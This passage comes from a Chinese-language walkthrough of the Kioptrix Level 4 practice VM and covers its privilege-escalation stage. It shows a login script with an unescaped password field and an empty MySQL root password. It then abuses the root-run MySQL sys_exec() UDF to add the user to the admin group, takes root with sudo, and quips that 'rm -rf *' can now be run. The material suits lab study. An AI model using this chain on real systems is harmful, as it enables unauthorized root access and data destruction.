    root      2664     2  0 16:22 ?        00:00:00 [scsi_eh_8]
    root      2665     2  0 16:22 ?        00:00:00 [scsi_eh_9]
    root      2666     2  0 16:22 ?        00:00:00 [scsi_eh_10]
    root      2667     2  0 16:22 ?        00:00:00 [scsi_eh_11]
    root      2668     2  0 16:22 ?        00:00:00 [scsi_eh_12]
    root      2669     2  0 16:22 ?        00:00:00 [scsi_eh_13]
    root      2670     2  0 16:22 ?        00:00:00 [scsi_eh_14]
    root      2671     2  0 16:22 ?        00:00:00 [scsi_eh_15]
    root      2672     2  0 16:22 ?        00:00:00 [scsi_eh_16]
    root      2673     2  0 16:22 ?        00:00:00 [scsi_eh_17]
    root      2674     2  0 16:22 ?        00:00:00 [scsi_eh_18]
    root      2675     2  0 16:22 ?        00:00:00 [scsi_eh_19]
    root      2676     2  0 16:22 ?        00:00:00 [scsi_eh_20]
    root      2677     2  0 16:22 ?        00:00:00 [scsi_eh_21]
    root      2678     2  0 16:22 ?        00:00:00 [scsi_eh_22]
    root      2679     2  0 16:22 ?        00:00:00 [scsi_eh_23]
    root      2680     2  0 16:22 ?        00:00:00 [scsi_eh_24]
    root      2681     2  0 16:22 ?        00:00:00 [scsi_eh_25]
    root      2682     2  0 16:22 ?        00:00:00 [scsi_eh_26]
    root      2683     2  0 16:22 ?        00:00:00 [scsi_eh_27]
    root      2684     2  0 16:22 ?        00:00:00 [scsi_eh_28]
    root      2685     2  0 16:22 ?        00:00:00 [scsi_eh_29]
    root      2686     2  0 16:22 ?        00:00:00 [scsi_eh_30]
    root      2990     2  0 16:22 ?        00:00:00 [scsi_eh_31]
    root      2992     2  0 16:22 ?        00:00:00 [scsi_eh_32]
    root      3287     2  0 16:22 ?        00:00:00 [kjournald]
    root      3458     1  0 16:22 ?        00:00:00 /sbin/udevd --daemon
    root      3805     2  0 16:22 ?        00:00:00 [kgameportd]
    root      4103     2  0 16:22 ?        00:00:00 [kpsmoused]
    root      5400     1  0 16:22 tty4     00:00:00 /sbin/getty 38400 tty4
    root      5401     1  0 16:22 tty5     00:00:00 /sbin/getty 38400 tty5
    root      5408     1  0 16:22 tty2     00:00:00 /sbin/getty 38400 tty2
    root      5410     1  0 16:22 tty3     00:00:00 /sbin/getty 38400 tty3
    root      5413     1  0 16:22 tty6     00:00:00 /sbin/getty 38400 tty6
    syslog    5449     1  0 16:22 ?        00:00:00 /sbin/syslogd -u syslog
    root      5468     1  0 16:22 ?        00:00:00 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/kmsg
    klog      5470     1  0 16:22 ?        00:00:00 /sbin/klogd -P /var/run/klogd/kmsg
    root      5489     1  0 16:22 ?        00:00:00 /usr/sbin/sshd
    root      5545     1  0 16:22 ?        00:00:00 /bin/sh /usr/bin/mysqld_safe
    root      5587  5545  0 16:22 ?        00:00:04 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=root --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock
    root      5588  5545  0 16:22 ?        00:00:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
    root      5662     1  0 16:22 ?        00:00:00 /usr/sbin/nmbd -D
    root      5664     1  0 16:22 ?        00:00:00 /usr/sbin/smbd -D
    root      5678  5664  0 16:22 ?        00:00:00 /usr/sbin/smbd -D
    root      5679     1  0 16:22 ?        00:00:00 /usr/sbin/winbindd
    root      5683  5679  0 16:22 ?        00:00:00 /usr/sbin/winbindd
    daemon    5700     1  0 16:22 ?        00:00:00 /usr/sbin/atd
    root      5711     1  0 16:22 ?        00:00:00 /usr/sbin/cron
    root      5733     1  0 16:22 ?        00:00:00 /usr/sbin/apache2 -k start
    dhcp      5783     1  0 16:22 ?        00:00:00 dhclient eth1
    root      5790     1  0 16:22 tty1     00:00:00 /sbin/getty 38400 tty1
    root      5806  5679  0 16:34 ?        00:00:00 /usr/sbin/winbindd
    root      5807  5679  0 16:34 ?        00:00:00 /usr/sbin/winbindd
    www-data  6714  5733  0 17:21 ?        00:00:00 /usr/sbin/apache2 -k start
    www-data  6715  5733  0 17:21 ?        00:00:00 /usr/sbin/apache2 -k start
    www-data  6716  5733  0 17:21 ?        00:00:00 /usr/sbin/apache2 -k start
    www-data  6717  5733  0 17:21 ?        00:00:00 /usr/sbin/apache2 -k start
    www-data  6718  5733  0 17:21 ?        00:00:00 /usr/sbin/apache2 -k start
    www-data  6719  5733  0 17:21 ?        00:00:00 /usr/sbin/apache2 -k start
    www-data  6720  5733  0 17:21 ?        00:00:00 /usr/sbin/apache2 -k start
    root      6729  5489  0 17:58 ?        00:00:00 sshd: john [priv]
    john      6731  6729  0 17:58 ?        00:00:00 sshd: john@pts/0 
    john      6732  6731  0 17:58 pts/0    00:00:00 python /bin/kshell
    john      6733  6732  0 18:02 pts/0    00:00:00 sh -c /bin/bash
    john      6734  6733  0 18:02 pts/0    00:00:00 /bin/bash
    john      6753  6734  0 18:05 pts/0    00:00:00 ps -ef

    确认mysql是 root权限启动
    我们将尝试利用mysql 提权

    3.3.2 php文件查找

    john@Kioptrix4:~$ find /var/www -name *.php

    3.3.3 查看php文件

    john@Kioptrix4:~$ cat /var/www/checklogin.php
    $host="localhost"; // Host name
    $username="root"; // Mysql username
    $password=""; // Mysql password
    $db_name="members"; // Database name
    $tbl_name="members"; // Table name
    // Connect to server and select databse.
    mysql_connect("$host", "$username", "$password")or die("cannot connect");
    mysql_select_db("$db_name")or die("cannot select DB");
    // Define $myusername and $mypassword
    // To protect MySQL injection (more detail about MySQL injection)
    $myusername = stripslashes($myusername);
    //$mypassword = stripslashes($mypassword);
    $myusername = mysql_real_escape_string($myusername);
    //$mypassword = mysql_real_escape_string($mypassword);
    //$sql="SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'";
    $result=mysql_query("SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'");
    // Mysql_num_row is counting table row
    // If result matched $myusername and $mypassword, table row must be 1 row
    // Register $myusername, $mypassword and redirect to file "login_success.php"
    else {
    echo "Wrong Username or Password";
    ); } ob_end_flush(); ?>


    3.3.4 登录mysql数据库

    john@Kioptrix4:~$ mysql -u root -p
    Enter password: 
    Welcome to the MySQL monitor.  Commands end with ; or \g.
    Your MySQL connection id is 6258
    Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)
    Type 'help;' or '\h' for help. Type '\c' to clear the buffer.


    3.3.5 查看udf表

    mysql> SELECT * FROM mysql.func;
    | name                  | ret | dl                  | type     |
    | lib_mysqludf_sys_info |   0 | lib_mysqludf_sys.so | function | 
    | sys_exec              |   0 | lib_mysqludf_sys.so | function | 
    2 rows in set (0.00 sec)


    3.3.6 管理员用户组添加

    利用 sys_exec()函数将john用户添加到管理员组。

    mysql> select sys_exec('usermod -a -G admin john '); 
    | sys_exec('usermod -a -G admin john ') |
    | NULL                                  | 
    1 row in set (0.04 sec)


    3.3.7 切换超级管理员


    john@Kioptrix4:~$ sudo su
    [sudo] password for john: 
    root@Kioptrix4:/home/john# id
    uid=0(root) gid=0(root) groups=0(root)
    root@Kioptrix4:/home/john# whoami

    我们到这里已经获得root权限,O(∩_∩)O哈哈~ 可以执行rm -rf * 了

    3.3.8 flag

    root@Kioptrix4:/home/john# cd /root
    root@Kioptrix4:~# ls
    congrats.txt  lshell-0.9.12
    root@Kioptrix4:~# cat congrats.txt
    You've got root.
    There is more then one way to get root on this system. Try and find them.
    I've only tested two (2) methods, but it doesn't mean there aren't more.
    As always there's an easy way, and a not so easy way to pop this box.
    Look for other methods to get root privileges other than running an exploit.
    It took a while to make this. For one it's not as easy as it may look, and
    also work and family life are my priorities. Hobbies are low on my list.
    Really hope you enjoyed this one.
    If you haven't already, check out the other VMs available on:
    Thanks for playing,



    在本次Kioptrix Level #4靶机渗透测试,内容包括主机扫描(nmap\netdiscover)、端口扫描(nmap\masscan)、目录扫描(dirb\dirsearch)、SQL注入、使用udf进行系统提权等内容:

    • 主机发现
    • 目录扫描
    • 端口扫描
    • SQL注入
    • shell逃逸
    • udf系统提权


